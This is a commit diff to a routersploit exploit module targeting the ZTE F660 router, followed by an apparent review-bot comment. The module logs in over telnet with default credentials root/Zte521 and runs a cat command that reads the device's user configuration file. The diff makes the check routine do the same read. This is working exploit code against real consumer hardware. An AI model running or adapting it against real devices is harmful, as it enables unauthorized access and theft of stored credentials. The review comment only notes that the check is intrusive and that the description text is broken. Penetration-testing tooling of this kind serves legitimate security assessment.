Commit 5d5a2e16 by devilscream

Fix exploits ZTE F660 Config Disclosure

parent 0e94b3f1
...@@ -9,18 +9,17 @@ from routersploit import ( ...@@ -9,18 +9,17 @@ from routersploit import (
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploit implementation for ZTE F660 config disclosure vulnerability. Exploit implementation for ZTE F660 Config Disclosure.
If the target is vulnerable it is possible to authenticate to the device" If the target is vulnerable it is possible to authenticate to the device"
""" """
__info__ = { __info__ = {
'name': 'ZTE F660 Config Disclosure', 'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 config disclosure vulnerability. If the target is is possible to authentiate to the device.', 'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'authors': [ 'authors': [
'devilscream', # vulnerability discovery 'devilscream' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
], ],
'references': [ 'references': [
'', 'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
], ],
'devices': [ 'devices': [
'ZTE ZXA10 F660' 'ZTE ZXA10 F660'
...@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit): ...@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit):
} }
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
username = "root" password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
password = "Zte521"
config = "cat /userconfig/cfg/db_user_cfg.xml" config = "cat /userconfig/cfg/db_user_cfg.xml"
def run(self): def run(self):
...@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit): ...@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit):
if any(map(lambda x: x in res, ["#", "$", ">"])): if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication") print_success("Telnet - Successful authentication")
tn.write(self.config + "\r\n") tn.write(self.config + "\r\n")
tn.interact()
tn.close() tn.close()
except: except:
...@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit): ...@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit):
tn.write(self.username + "\r\n") tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5) tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n") tn.write(self.password + "\r\n")
tn.write("\r\n") tn.write(self.config + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close() tn.close()
...@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit): ...@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit):
if i != -1: if i != -1:
return False return False
else: else:
if any(map(lambda x: x in res, ["#", "$", ">"])): if any(map(lambda x: x in res, ["<DM name="])):
tn.close() tn.close()
return True return True
tn.close() tn.close()
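Review bot: In the last two hunks, what appears to be the check method (it returns True/False) now sends `self.config` and tests the reply for `<DM name=`, so a plain check logs in and pulls the device's user configuration into `res` instead of only testing the login, and nothing in the module documents that. I would add a comment above the new write, for example `# NOTE: check is intrusive - it logs in and reads db_user_cfg.xml; res then holds config contents`, so anyone running or reviewing the module knows what it reads. The one-element `any(map(lambda x: x in res, ["<DM name="]))` reads more plainly as `if "<DM name=" in res:`. In the first hunk the new `description` string dropped the words "vulnerable it is" and still spells "authentiate", which leaves the sentence broken. The enclosing methods start and end outside the visible hunks, so the surrounding login and error handling could not be reviewed.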